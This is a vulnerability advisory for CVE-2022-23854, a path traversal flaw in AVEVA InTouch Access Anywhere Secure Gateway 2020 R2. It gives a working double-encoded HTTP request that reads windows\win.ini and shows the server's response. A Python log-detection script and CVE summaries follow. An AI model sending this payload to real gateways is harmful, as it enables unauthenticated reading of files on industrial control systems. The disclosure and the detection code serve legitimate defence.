AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 Path Traversal
AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 suffers from a path traversal vulnerability.
Exploit Title: AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal
Exploit Author: Jens Regel (CRISEC IT-Security)
Date: 11/11/2022
CVE: CVE-2022-23854
Version: Access Anywhere Secure Gateway versions 2020 R2 and older

Proof of Concept:

GET /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1

HTTP/1.1 200 OK
Server: EricomSecureGateway/8.4.0.26844.*
(..)
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
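For detection in gateway access logs or at an upstream proxy: the request above hides `..\` behind two layers of percent-encoding (`%252e%252e%255c`), so a filter that decodes only once sees `%2e%2e%5c` and no traversal. The Python below is an added example, not part of the original advisory and not AVEVA or Ericom code; it decodes each path until it is stable and then looks for `..` segments. The sample request lines (including a shortened form of the PoC path) and the decode-round limit are constructed assumptions.

```python
import re
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 5  # assumption: no legitimate client nests encoding this deep

# A ".." path segment bounded by "/" or "\" (or by the start/end of the path).
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def fully_decode(path):
    """Percent-decode until stable; return (decoded_path, rounds_that_changed_it)."""
    rounds = 0
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
        rounds += 1
    return path, rounds


def classify(request_line):
    """Return a verdict dict for one 'METHOD target HTTP/x' request line."""
    parts = request_line.split(" ")
    target = parts[1] if len(parts) >= 2 else request_line
    path = target.split("?", 1)[0]  # the query string is not part of the file path
    decoded, rounds = fully_decode(path)
    return {
        "decoded": decoded,
        "rounds": rounds,
        "traversal": bool(TRAVERSAL.search(decoded)),
        "multi_encoded": rounds > 1,  # nested encoding is itself worth alerting on
    }


# Constructed sample request lines; the first is a shortened form of the PoC path.
SAMPLES = [
    "GET /AccessAnywhere/%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1",
    "GET /AccessAnywhere/start.html HTTP/1.1",
    "GET /AccessAnywhere/%2e%2e/%2e%2e/file HTTP/1.1",
    "GET /AccessAnywhere/report%20v1..2.pdf HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        v = classify(line)
        flag = "ALERT" if v["traversal"] else "ok"
        print(f"{flag:5} rounds={v['rounds']} {v['decoded']}")
```

The `multi_encoded` flag is useful on its own: a path that needs more than one decoding pass is rarely benign, even when no `..` segment remains after decoding.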
Related news
CVE-2022-23854
AVEVA InTouch Access Anywhere versions 2020 R2 and older are vulnerable to a path traversal exploit that could allow an unauthenticated user with network access to read files on the system outside of the secure gateway web server.
InTouch Access Anywhere Secure Gateway 2020 R2 Path Traversal
InTouch Access Anywhere Secure Gateway versions 2020 R2 and below suffer from a path traversal vulnerability.